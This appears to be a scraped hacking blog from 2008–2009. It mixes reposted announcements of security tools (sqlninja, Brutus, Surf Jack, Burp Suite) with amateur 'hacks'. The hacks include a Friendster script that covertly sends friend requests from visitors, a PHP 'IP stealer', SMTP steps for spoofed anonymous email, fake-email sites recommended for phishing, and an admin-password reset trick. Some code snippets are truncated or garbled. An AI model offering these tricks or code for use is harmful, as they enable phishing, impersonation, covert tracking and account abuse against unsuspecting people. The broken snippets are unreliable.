4. Perform axfr queries on nameservers (threaded).
5. Get extra names and subdomains via google scraping (google query = “allinurl: -www site:domain”).
6. Brute force subdomains from file, can also perform recursion on subdomain that have NS records (all threaded).
7. Calculate C class domain network ranges and perform whois queries on them (threaded).
8. Perform reverse lookups on netranges ( C class or/and whois netranges) (threaded).
9. Write to domain_ips.txt file ip-blocks.

The output file domain_ips.txt will contain non-contiguous IP blocks:

127.0.0.1/32
127.0.0.8/31

You can download DNSenum v1.2 here:

dnsenum1.2.tar.gz

Or you can read more here.
from darknet

Goolag - GUI Tool for Google Hacking

2009-01-03T02:30:00.000-08:00

Goolag - GUI Tool for Google Hacking

cDc (Cult of the Dead Cow) recently released a GUI driven tool for Google Hacking called Goolag.

Google Dorks have been around for several years and have been researched most assiduously by Johnny I Hack Stuff.

If one searches the Web, one will find multiple collections of dorks, and also some applications - standalone and Web-based - offering certain “scanning” possibilities.

Nevertheless, gS is different from other applications released to date for the following reasons:

* There is no need for a special tool to use dorks other than a browser, but scanning hundreds of dorks ‘by hand’ is impossible.
* Goolag Scanner is focused on usability. It simplifies the use of myriad numbers of dorks to a few mouse clicks. No cryptic command line options and no knowledge of Google hacking are required to test one’s host.
* Goolag Scanner comes with its own dorks-database, but it is not limited to such.
* gS uses a very simple xml-document, which is readable and part of the distribution.

This software requires Microsoft .NET Framework Version 2.0.

You can download Goolag here:

Goolag (1.0.0.40)

Or read more here.
from darknet

Burp Suite v1.1 Available for Download

2009-01-03T02:28:00.000-08:00

Burp Suite v1.1 Available for Download

One of our favourite all time tools for attacking web applications has been updated! Burp Suite has now reached version 1.1! This is a major release - not a minor upgrade.

Burp Suite is an integrated platform for attacking web applications. It contains all of the Burp tools with numerous interfaces between them designed to facilitate and speed up the process of attacking an application. All tools share the same robust framework for handling HTTP requests, authentication, downstream proxies, logging, alerting and extensibility.

Burp Suite allows you to combine manual and automated techniques to enumerate, analyse, attack and exploit web applications. The various Burp tools work together effectively to share information and allow findings identified within one tool to form the basis of an attack using another.

Key features unique to Burp Suite include:

* Ability to “passively” spider an application in a non-intrusive manner, with all requests originating from the user’s browser.
* One-click transfer of interesting requests between tools, e.g. from the Burp Proxy request history, or the Burp Spider results tree.
* Detailed analysis and rendering of requests and responses.
* Extensibility via the IBurpExtender interface, which allows third-party code to extend the functionality of Burp Suite. Data processed by one tool can be used in arbitrary ways to affect the behaviour and results of other tools.
* Centrally configured settings for downstream proxies, web and proxy authentication, and logging.
* Tools can run in a single tabbed window, or be detached in individual windows.
* All tool and suite configuration is optionally persistent across program loads.
* Runs in both Linux and Windows.

New features in version 1.1 include:

* Improved analysis of HTTP requests and responses wherever they appear, with browser-quality HTML and media rendering.
* Burp Sequencer, a new tool for analysing session token randomness.
* Burp Decoder, a new tool for performing manual and intelligent decoding and encoding of application data.
* Burp Comparer, a new utility for performing a visual diff of any two data items.
* Support for custom client and server SSL certificates.
* Ability to follow 3xx redirects in Burp Intruder and Repeater attacks.
* Improved interception and match-and-replace rules in Burp Proxy.
* A “lean mode”, for users who prefer less functionality and a smaller resource footprint.

You can download Burp Suite here:

burpsuite_v1.1.zip
burpsuite_v1.1.tar.gz
Or read more here.
from darknet

Password Cracking Wordlists and Tools for Brute Forcing

2009-01-03T02:25:00.000-08:00

Password Cracking Wordlists and Tools for Brute Forcing

I quite often get people asking me where to get Wordlists, after all brute forcing and password cracking often relies on the quality of your word list.

Do note there are also various tools to generate wordlists for brute forcing based on information gathered such as documents and web pages (such as Wyd - password profiling tool) These are useful resources that can add unique words that you might not have if your generic lists.

Also add all the company related words you can and if possible use industry specific word lists (chemical names for a lab, medical terms for a hospital etc).

And always brute force in the native language.

You can find a simple wordlist generator in PERL here.

Although old, one of the most complete wordlist sets is here (easily downloadable by FTP too):

Oxford Uni Wordlists

There’s a good set of lists here including many european languages and topic specific lists:

The Argon Wordlists

Here we have 50,000 words, common login/passwords and African words (this used to be a great resource):

Totse Word Lists

There’s a good French word list here with and without accents, also has some other languages including names:

Wordlists for bruteforce crackers

One of the most famous lists is still from Openwall (the home of John the Ripper) and now costs money for the full version:

Openwall Wordlists Collection

Some good lists here organized by topic:

Outpost9 Word lists

Packetstorm has some good topic based lists including sciences, religion, music, movies and common lists. Packetstorm word lists
You can also check out some default password lists
from darknet

Wireshark v1.0.0 Released - Cross Platform Graphical Packet Sniffer

2009-01-03T02:23:00.000-08:00

Wireshark v1.0.0 Released - Cross Platform Graphical Packet Sniffer
After nearly 10 years of developement Wireshark (formely known as Ethereal) has finally reached version 1!

For those that don’t know, Wireshark is the world’s foremost network protocol analyzer, and is the de facto (and often de jure) standard across many industries and educational institutions.

Wireshark development thrives thanks to the contributions of networking experts across the globe. It is the continuation of a project that started in 1998.

Features

Wireshark has a rich feature set which includes the following:

* Deep inspection of hundreds of protocols, with more being added all the time
* Live capture and offline analysis
* Standard three-pane packet browser
* Multi-platform: Runs on Windows, Linux, OS X, Solaris, FreeBSD, NetBSD, and many others
* Captured network data can be browsed via a GUI, or via the TTY-mode TShark utility
* The most powerful display filters in the industry
* Rich VoIP analysis
* Read/write many different capture file formats: tcpdump (libpcap), Catapult DCT2000, Cisco Secure IDS iplog, Microsoft Network Monitor, Network General Sniffer® (compressed and uncompressed), Sniffer® Pro, and NetXray®, Network Instruments Observer, Novell LANalyzer, RADCOM WAN/LAN Analyzer, Shomiti/Finisar Surveyor, Tektronix K12xx, Visual Networks Visual UpTime, WildPackets EtherPeek/TokenPeek/AiroPeek, and many others
* Capture files compressed with gzip can be decompressed on the fly
* Live data can be read from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, FDDI, and others (depending on your platfrom)
* Decryption support for many protocols, including IPsec, ISAKMP, Kerberos, SNMPv3, SSL/TLS, WEP, and WPA/WPA2
* Coloring rules can be applied to the packet list for quick, intuitive analysis
* Output can be exported to XML, PostScript®, CSV, or plain text

This is one tool EVERYONE involved in security or network administration should be familiar with.

You can download Wireshark here:

Wireshark v1.0.0

Or read more here.
from darknet

ProxyStrike - Active Web Application Proxy

2009-01-03T02:22:00.000-08:00

ProxyStrike - Active Web Application Proxy

ProxyStrike is an active Web Application Proxy, is a tool designed to find vulnerabilities while browsing an application. It was created because the problems faced in the pentests of web applications that depends heavily on Javascript, not many web scanners did it good in this stage, so ProxyStrike was born.

Right now it has available SQL injection and XSS modules. Both modules are designed to catch as many vulnerabilities as they can, it’s that why the SQL Injection module is a Python port of the great “SQLibf“.

The process is very simple, ProxyStrike runs like a passive proxy listening in port 8008 by default, so you have to browse the desired web site setting your browser to use ProxyStrike as a proxy, and ProxyStrike will analyze all the paremeters in background mode. For the user is a passive proxy because you won’t see any different in the behaviour of the application, but in the background is very active.

Features:

* HTTP request/response history
* Request parameter stats
* Request parameter values stats
* Request URL parameter signing and header field signing
* Use of an alternate proxy (tor for example)
* SQL attacks
* XSS attacks
* Export results to HTML or XML
* Console version (python proxystrike.py -c / proxystrike.exe -c)

You can download ProxyStrike here:

ProxyStrike v1.0 (Windows) (26/03/2008)
ProxyStrike v1.0 (Linux/OSX) (26/03/2008)

Or read more here.
from darknet

sqlninja 0.2.2 Released for Download - SQL Injection Tool

2009-01-03T02:21:00.000-08:00

sqlninja 0.2.2 Released for Download - SQL Injection Tool

Sqlninja is a tool to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end. Its main goal is to provide a remote shell on the vulnerable DB server, even in a very hostile environment. It should be used by penetration testers to help and automate the process of taking over a DB Server when a SQL Injection vulnerability has been discovered.

It is written in Perl, it is released under the GPLv2 and so far has been successfully tested on:

* Linux
* FreeBSD
* Mac OS X

Features

* Fingerprint of the remote SQL Server (version, user performing the queries, user privileges, xp_cmdshell availability, authentication mode)
* Bruteforce of ’sa’ password, both dictionary-based and incremental
* Privilege escalation to ’sa’ if its password has been found
* Creation of a custom xp_cmdshell if the original one has been disabled
* Upload of netcat.exe (or any other executable) using only 100% ASCII GET/POST requests, so no need for FTP connections
* TCP/UDP portscan from the target SQL Server to the attacking machine, in order to find a port that is allowed by the firewall of the target network and use it for a reverse shell
* Direct and reverse bindshell, both TCP and UDP
* DNS-tunneled pseudo-shell, when no TCP/UDP ports are available for a direct/reverse shell, but the DB server can resolve external hostnames

What’s new

* Evasion techniques, in order to obfuscate the injected code and confuse/bypass signature-based IPS and application firewalls
* A more sophisticated upload module
* A new ‘blind execution’ attack mode, useful to issue commands and performs diagnostics when other modes fail
* Automatic URL-encoding now is performed only on sqlninja generated SQL code, giving the user a more granular control on the exploit strings

You can download Sqlninja 0.2.2 here:

sqlninja-0.2.2.tgz

Or read more here.

Angry IP Scanner - Cross Platform Port Scanner

2009-01-03T02:11:00.000-08:00

Angry IP Scanner - Cross Platform Port Scanner

Angry IP scanner is a very fast IP address and port scanner.

It can scan IP addresses in any range as well as any their ports. It is cross-platform and lightweight. Not requiring any installations, it can be freely copied and used anywhere.

Angry IP scanner simply pings each IP address to check if it’s alive, then optionally it is resolving its hostname, determines the MAC address, scans ports, etc. The amount of gathered data about each host can be extended with plugins.

It also has additional features, like NetBIOS information (computer name, workgroup name, and currently logged in Windows user), favorite IP address ranges, web server detection, customizable openers, etc.

Scanning results can be saved to CSV, TXT, XML or IP-Port list files. With help of plugins, Angry IP Scanner can gather any information about scanned IPs. Anybody who can write Java code is able to write plugins and extend functionality of Angry IP Scanner.

In order to increase scanning speed, it uses multithreaded approach: a separate scanning thread is created for each scanned IP address. It is also cross platform running on Windows, Linux & Mac.

You can download Angry IP Scanner version 3.0-beta3 below:

Executable for Windows 2000/XP/Vista
Executable JAR for any distribution of Linux (32-bit)

Or read more here.
from darknet

HttpBee - Web Application Hacking Toolkit

2009-01-03T02:09:00.000-08:00

HttpBee - Web Application Hacking Toolkit

HttpBee is a swiss-army-knife tool for web application hacking. It is multi-threaded, embedded with scriptable engine and has both command-line and daemon mode (if executed in daemon mode, HttpBee can become an agent of a distributed framework).

This is a tool for more advanced users and there isn’t much documentation so if anyone feels like writing a more comprehensive guide or tutorial, please do so!

Installing

You will need lua 5.1.x. Grab it at http://www.lua.org/ftp/

You will also need pcre library.

There’s no ./configure script in HttpBee at the moment, so you will need to change Makefile directly before you build it. Look into CXXFLAGS and CFLAGS section. -DOS_X (or -DLINUX, or -DWINDOWS is basically a setting for your platform, plus, ajust the pathes).

Using

The folder ‘modules’ contains lua plugins that HttpBee uses to perform its assessment tasks. You can run HttpBee as ./httpbee -s path/to/modules/script.lua -t 255 -h localhost (specifying different number of parallel threads impacts performance)

Scripting

The way HttpBee’s scripting engine is implemented is relevant to HttpBee architecture itself. HttpBee maintains a pool of threads that it uses for parallel task execution. Therefore execution of HttpBee scripts is not linear. Instead, there are certain functions which are executed at certain steps of scanning process. The global scripting part is executed when the script is initially “scanned”, so HttpBee can pick up tags, description and other data from your script. init function will be executed only when your script is picked up and scheduled for execution (based on tags selection for example).

You can download HttpBee here:

httpbee-1.0rc1.tgz

Or read more here.
from darknet

Brutus Password Cracker-Download brutus-aet2.zip AET2

2009-01-03T02:06:00.000-08:00

Brutus Password Cracker - Download brutus-aet2.zip AET2

A lot of people come to Darknet looking for Brutus AET2 (brutus-aet2.zip) to download, but unfortunately due to some stupid Homeland security bullshit I actually had to remove the file or risk having no hosting left..

If you don’t know, Brutus is one of the fastest, most flexible remote password crackers you can get your hands on - it’s also free. It is available for Windows 9x, NT and 2000, there is no UN*X version available although it is a possibility at some point in the future. Brutus was first made publicly available in October 1998 and since that time there have been at least 70,000 downloads and over 175,000 visitors to this page. Development continues so new releases will be available in the near future.

Brutus was written originally to help me check routers etc. for default and common passwords.

Features

Brutus version AET2 is the current release and includes the following authentication types :

* HTTP (Basic Authentication)
* HTTP (HTML Form/CGI)
* POP3
* FTP
* SMB
* Telnet

Other types such as IMAP, NNTP, NetBus etc are freely downloadable from this site and simply imported into your copy of Brutus. You can create your own types or use other peoples.

The current release includes the following functionality :

* Multi-stage authentication engine
* 60 simultaneous target connections
* No username, single username and multiple username modes
* Password list, combo (user/password) list and configurable brute force modes
* Highly customisable authentication sequences
* Load and resume position
* Import and Export custom authentication types as BAD files seamlessly
* SOCKS proxy support for all authentication types
* User and password list generation and manipulation functionality
* HTML Form interpretation for HTML Form/CGI authentication types
* Error handling and recovery capability inc. resume after crash/failure.

You can download it here:
Brutus AET2

from darknet

Top 15 Security/Hacking Tools & Utilities

2009-01-03T01:58:00.000-08:00

Top 15 Security/Hacking Tools & Utilities

1. Nmap

I think everyone has heard of this one, recently evolved into the 4.x series.

Nmap (”Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.

Can be used by beginners (-sT) or by pros alike (–packet_trace). A very versatile tool, once you fully understand the results.

Get Nmap Here

2. Nessus Remote Security Scanner

Recently went closed source, but is still essentially free. Works with a client-server framework.

Nessus is the world’s most popular vulnerability scanner used in over 75,000 organizations world-wide. Many of the world’s largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications.

Get Nessus Here

3. John the Ripper

Yes, JTR 1.7 was recently released!

John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.

You can get JTR Here

4. Nikto

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).

Nikto is a good CGI scanner, there are some other tools that go well with Nikto (focus on http fingerprinting or Google hacking/info gathering etc, another article for just those).

Get Nikto Here

5. SuperScan

Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the highly popular Windows port scanning tool, SuperScan.

If you need an alternative for nmap on Windows with a decent interface, I suggest you check this out, it’s pretty nice.

Get SuperScan Here

6. p0f

P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:

- machines that connect to your box (SYN mode),
- machines you connect to (SYN+ACK mode),
- machine you cannot connect to (RST+ mode),
- machines whose communications you can observe.

Basically it can fingerprint anything, just by listening, it doesn’t make ANY active connections to the target machine.

Get p0f Here

7. Wireshark (Formely Ethereal)

Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers.

Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later.

Get Wireshark Here

8. Yersinia

Yersinia is a network tool designed to take advantage of some weakeness in different Layer 2 protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. Currently, the following network protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP).

The best Layer 2 kit there is.

Get Yersinia Here

9. Eraser

Eraser is an advanced security tool (for Windows), which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Works with Windows 95, 98, ME, NT, 2000, XP and DOS. Eraser is Free software and its source code is released under GNU General Public License.

An excellent tool for keeping your data really safe, if you’ve deleted it..make sure it’s really gone, you don’t want it hanging around to bite you in the ass.

Get Eraser Here.

10. PuTTY

PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms, along with an xterm terminal emulator. A must have for any h4×0r wanting to telnet or SSH from Windows without having to use the crappy default MS command line clients.

Get PuTTY Here.

11. LCP

Main purpose of LCP program is user account passwords auditing and recovery in Windows NT/2000/XP/2003. Accounts information import, Passwords recovery, Brute force session distribution, Hashes computing.

A good free alternative to L0phtcrack.

LCP was briefly mentioned in our well read Rainbow Tables and RainbowCrack article.

Get LCP Here

12. Cain and Abel

My personal favourite for password cracking of any kind.

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort.

Get Cain and Abel Here

13. Kismet

Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.

A good wireless tool as long as your card supports rfmon (look for an orinocco gold).

Get Kismet Here

14. NetStumbler

Yes a decent wireless tool for Windows! Sadly not as powerful as it’s Linux counterparts, but it’s easy to use and has a nice interface, good for the basics of war-driving.

NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:

* Verify that your network is set up the way you intended.
* Find locations with poor coverage in your WLAN.
* Detect other networks that may be causing interference on your network.
* Detect unauthorized “rogue” access points in your workplace.
* Help aim directional antennas for long-haul WLAN links.
* Use it recreationally for WarDriving.

Get NetStumbler Here

15. hping

To finish off, something a little more advanced if you want to test your TCP/IP packet monkey skills.

hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.

Get hping Here

Yah I’ve stayed away from commercial products in this article, perhaps I’ll cover those another day.

from darknet

bsqlbf 1.1 - Blind SQL Injection Tool

2009-01-03T01:57:00.001-08:00

bsqlbf 1.1 - Blind SQL Injection Tool
bsqlbf is a tool for Blind SQL Injection attacks, a pretty nifty one too!

The author says there are similar tools about, but he’s tried to combine all the techniques into one compact but complete tool.

bsqlbf 1.1

# CHANGELOG:
# -get now support resume (with -start option)
# -get to fetch files (thank you ilo AGAIN)
# + -time option added (IDS bypass)
# + -rtime option added (IDS bypass)
# + -rproxy option added (IDS bypass)
# + -ruagent option added (IDS bypass)

There is a decent GUI front end in Perl-Tk made by Gandalfj, a Windows version is available for download too.

You can download bsqlbf 1.1 here (Original page in Spanish).
from darknet

Paros Proxy 3.2.10 Released - MITM HTTP and HTTPS Proxy

2009-01-03T01:55:00.000-08:00

Paros Proxy 3.2.10 Released - MITM HTTP and HTTPS Proxy

One of my favourite proxy options, along side the Burp Proxy (evolved into Burp Suite).

I’ll definately talk more about the Burp Suite later as it’s excellent for testing anything web-based.

Paros labels itself as MITM Proxy + Spider + Scanner plus anything else you want it to be, it is a pretty neat piece of software.

It’s particularly useful for testing web applications and things such as insecure sessions.

Paros is free of charge and completely written in Java. Through Paros’s proxy nature, all HTTP and HTTPS data between server and client, including cookies and form fields, can be intercepted and modified.

These proxies have a different purpose than those personal type proxies like Proxomitron which are intended to protect you, clean adverts, block spyware and so on. Proxies like Paros and Burp are meant for examining the security of applications and web application auditing.

You do need Java Run Time Enviroment (JRE) 1.4 (or above) to install Paros.

You can download the latest version of Paros Here.
from darknet

Surf Jack - Cookie Session Stealing Tool

2009-01-03T01:51:00.000-08:00

Surf Jack - Cookie Session Stealing Tool

A tool which allows one to hijack HTTP connections to steal cookies - even ones on HTTPS sites! Works on both Wifi (monitor mode) and Ethernet.

Features:

* Does Wireless injection when the NIC is in monitor mode
* Supports Ethernet
* Support for WEP (when the NIC is in monitor mode)

Known issues:

* Sometimes the victim is not redirected correctly (particularly seen when targeting Gmail)
* Cannot stop the tool via a simple Control^C. This is a problem with the proxy

Requires:

* Python 2.4
* Scapy

You can download Surf Jack here:

SurfJack
from darknet
Or read more here

Google Trick .Image Flying Codes

2009-01-01T20:12:00.000-08:00

Go to Code:
Code:
http://www.google.com
2. Click "images"
3. Fill in "bikes, flowers, cars" or any other word.
4. You will get a page with alot of images thumbnailed.
5. Now delete the URL on the addressbar (example:

1. javascript:R= 0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI= document.images ; DIL=DI.length; function A(){for(i=0; igl
4. javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',50); void(0);

5. javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*1+i*x2+x3)*x1+x2)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',50); void(0);YeyeYeye

Copy the code and paste on address bar then hit enter and enjoy its

Friendster Auto FriendAdder!!

2008-12-30T05:49:00.000-08:00

Friendster Auto FriendAdder!!

This code will make the viewer automatically make a friend request to the profile with this code without him/her knowing it.

Code:
Code:

var afaimg = document.createElement('span');
afaimg.id = "addme";
document.getElementsByTagName('head')[0].appendChild(afaimg);

function afa() {
var eadd = "PUT YOUR FRIENDSTER ACCOUNTS E-MAIL ADDRESS HERE";
var k = document.getElementById("controlPanelButtons").innerHTML;
var a = k.slice(k.indexOf("authcode="));
var m = a.slice(9,39);
document.getElementById("addme").innerHTML = "";
}
if (!attachOnLoadHandler(function() { afa();})) window.onload = function() { afa();};

Replace PUT YOUR FRIENDSTER ACCOUNTS E-MAIL ADDRESS HERE with your Friendster account e-mail address.

Example:

var afaimg = document.createElement('span');
afaimg.id = "addme";
document.getElementsByTagName('head')[0].appendChild(afaimg);

function afa() {
var eadd = "testing@domain.com";
var k = document.getElementById("controlPanelButtons").innerHTML;
var a = k.slice(k.indexOf("authcode="));
var m = a.slice(9,39);
document.getElementById("addme").innerHTML = "";
}
if (!attachOnLoadHandler(function() { afa();})) window.onload = function() { afa();};

This is a .js script.

Go HERE for instructions on how to make a .js file and upload it to a host.

ANONYMOUS e-mails

2008-12-30T05:00:00.000-08:00

Welcome to Hackerdevil's guide on how to send ANONYMOUS e-mails to someone without a prog.

I am Hackerdevil and i am going to explain ya a way to send home-made e-mails. I mean its a way to send Annonimous e-mails without a program, it doesn't take
to much time and its cool and you can have more knowledge than with a stupid program that does all by itself.

This way (to hackers) is old what as you are newby to this stuff, perhaps you may like to know how these anonymailers work, (home-made)

Well.....
Go to Start, then Run...
You have to Telnet (Xserver) on port 25

Well, (In this Xserver) you have to put the name of a server without the ( ) of course...
Put in iname.com in (Xserver) because it always work it is a server with many bugs in it.
(25) mail port.

So now we are like this.

telnet iname.com 25

and then you hit enter
Then When you have telnet open put the following like it is written

helo

and the machine will reply with smth.

Notice for newbies: If you do not see what you are writing go to Terminal's menu (in telnet) then to Preferences and in the Terminal Options you tick all opctions available and in the emulation menu that's the following one you have to tick the second option.
Now you will se what you are writing.

then you put:

mail from: and so on...
If you make an error start all over again

Example:
mail from:

You hit enter and then you put:

rcpt to:(lamer@lamer'sworld.com) "Place that () to <>"!!
This one has to be an existance address as you are mailing anonymously to him.

Then you hit enter
And you type
Data
and hit enter once more

Then you write

Subject:whetever

And you hit enter

you write your mail

hit enter again (boring)

you put a simple:
.

Yes you don't see it its the little fucking point!
and hit enter
Finally you write
quit
hit enter one more time
and it's done

look:Try first do it with yourself I mean mail annonymously yourself so you can test it!
Don't be asshole and write fucking e-mails to big corps. bec' its symbol of stupidity and childhood and it has very very effect on Hackers they will treat you as a Lamer!

Really i don't know why i wrote this fucking disclaimer, but i don't want to feel guilty if you get into trouble....

Disclamer:Hackerdevil is not responsable for whetever you do with this info. you can destribute this but you are totally forbidden to take out the "By Hackerdevil" line. You can't modify or customize this text and i am also not responsable if you send an e-mail to an important guy and insult him, and i rectly advise you that this is for educational porpouses only my idea is for learning and having more knowledge, you can not get busted with this stuff but i don't take care if it anyway happen to you. If this method is new for ya probably you aren't a hacker so think that if someone wrote you an e-mail "yourbestfirend@aol.com" insulting you and it wasn't him it but was some guy using a program or this info you won't like it.so Use this method if you don't care a a damn hell or if you like that someone insult you.

By Hackerdevil

hackerdevil@iname.com
www.angelfire.com/ar/HDanzi/index.html

Remove "autorun.inf " from USB Drive!

2008-12-30T04:51:00.001-08:00

"autorun.inf" is not able to use, edit or delete directly and "Cut/Copy/Paste" may not work. To view this file entries.
1. Open the USB Drive.
2. On the Folder address bar (path) type (if USB is E:) - "E:\autorun.inf"
3. To replace this file - A simple procedure to remove/replace this "autorun.inf" is
- Create a text file named "autorun.inf" on the desktop, open that file and type "open", save and exit.
4. Now open the USB drive.
5. Drag "autorun.inf" from desktop to USB drive (Do not Copy Past, Only Drag and Drop)
6. Right Click "autorun.inf " , Go to "Security" Tab. Click 'Advanced' button. Use 'Edit' option to edit
each lines in 'Permission Entries ' and set "Deny" permission to all entries. This setting will prevent viruses from reacting 'autorun.inf'

i hope, it will help you...

How to make a boot CD by simple way

2008-12-30T04:39:00.000-08:00

How to make a boot CD by simple way

To make a boot CD, you’ll need “PE Builder”. You can download it from
the website http://www.nu2.nu/pebuilder

You will need

1.blank CD
2.CD R/W drive
3. OS CD eg.windows XP SP2
4. PE builder software

And then, simply do that steps,

1. Open PE Builder

2. Insert your OS CD in your CD drive.

3. In PE Builder software, press the source button and direct it to window CD path, eg. E:\

4. In Media output tab, choose Burn to CD/DVD.

5. Insert CD writer with blank CD.

6.Press Build button!

Anonymous Online

2008-12-30T04:26:00.000-08:00

Anonymous Online

First of all, check your ip: hide-my-ip
Now go get foxyproxy(I assume you have firefox). Download it.
Restart firefox. They will ask you if you want to configure foxyproxy with tor. Say YES. Go through the configuration. Restart again. Go on PROXY LIST or your favorite proxy server. Open foxyproxy (tools/addons). Add a new proxy. Name it as yo uwant a complete the fields with the proxy you want. In whitelist, add google.com as a joker and click ok. Go on any website and look at the bottom of the window. It will be written foxyproxy: deactivated. Right click on it and choose use YOURPROXY for all URLs. Then go check yout IP again. If it doesn't work...try with another proxy.

Hack Administrator

2008-12-30T04:14:00.000-08:00

Hack Administrator

Here we present the rock solid windows hacks
for educational purpose only! read disclaimer before reading this article!

_____

Windows NT/2000/XP/Vista offline password editor:
http://home.eunet.no/~pnordahl/ntpasswd

This is a utility to (re)set the password of any user that has a valid (local) account on your Windows NT/2000/XP/2003/Vista system, by modifying the encrypted password in the registry's SAM file.
You do not need to know the old password to set a new one.
It works offline, that is, you have to shutdown your computer and boot off a floppy disk or CD. The boot-disk includes stuff to access NTFS partitions and scripts to glue the whole thing together.
Works with syskey (no need to turn it off, but you can if you have lost the key)
Will detect and offer to unlock locked or disabled user accounts!
Caution: If used on users that have EFS encrypted files, and the system is XP or later service packs on W2K, all encrypted files for that user will be UNREADABLE! and cannot be recovered unless you remember the old password again!
Download links:
cd070409.zip (~3MB) - Bootable CD image with newer drivers
bd050303.zip (~1.1MB) - Bootdisk image, date 050303.
sc050303.zip(~1.4MB) - SCSI-drivers (050303) (only use newest drivers with newest bootdisk, this one works with bd050303)
To write these images to a floppy disk you'll need RawWrite2 which is included in the Bootdisk image download. To create the CD you just need to use your favorite CD burning program and burn the .ISO file to CD.

For Windows XP check out the attachment Below the comments!! It WORKS .AS IT CHANGES THE XP ADMIN PSWD WITHOUT U KNOWIN THE PREVIOUS ONE

however the "net user" and

"control userpasswords2" trick still works
: Rahul

You can change Administrator password from guest account without using any programs. It's easy:
1. Start-> Run, type lusrmgr.msc and hit Enter.
2. You will see window with two folders:Users and Groups. Go in the Users folder, find the Administrator, right click-> Set Password and now you can change the password without knowing the old one.

Sending Fake E-mails

2008-12-30T04:02:00.000-08:00

Sending Fake E-mails

Well, i see that there is much people asking for this, 'Where can i send fake emails?'.. 'How can i creat a fake e-mail?'. It is basic for some people but there is still someone asking for this.

So, there you have:

http://www.webwizny.com/sendemail.php
http://www.sendanonymousemail.net
http://www.deadfake.com/send.aspx
http://www.note2emai.com
http://www.fuzzmail.org
http://www.gilc.org/speech/anonymous/remailer.html
http://www.anonymousmail.net-anonymity.info

There you can send e-mails without the people know that it is you. That is good for sending Phishing pages using:

[ url = http://www.PHISH/FAKEPAGE.COM ] Name you want your friend to see [ / url ]
(without spaces)

PHP IP Stealer

2008-12-30T03:49:00.000-08:00

Php IP Stealer

This is so easy to do!!!

PHP Code:

$ip = $REMOTE_ADDR;
$host = gethostbyaddr($ip);
$date = date("d/m/Y H:i:s");
$email = "youremail@here.com";
$sujet = "Ip + Host";
$message = "Moment : $date
Ip : $ip
Host : $host";
if(mail($email,$sujet,$message,"Content-Type: text/html")){
echo "This you have been OWNED!";}
else { echo "Shit ?";}
?>

Change youremail@here.com with your email.
Create a php document, give the link to someone and you'll receive his/her IP and host in your email box...

RapidShare Hack

2008-12-30T03:43:00.000-08:00

RAPIDSHARE HACKED 100% WORKING
GOTO http://rs43.com/?click on the rapidshit!post the linkcopy the URL mirrorDownload HAVE FUN!

XP Hidden Music

2008-12-30T03:22:00.000-08:00

Hello Xp Users!!!..... this is a windows xp hidden musicgoto C:\Windows\system32\oobe\images.. there is a song named title.wma.. play it.. cool classic music.. have fun!!

Bit Torrent Tutorial

2008-12-30T03:20:00.000-08:00

Bit Torrent Tutorials

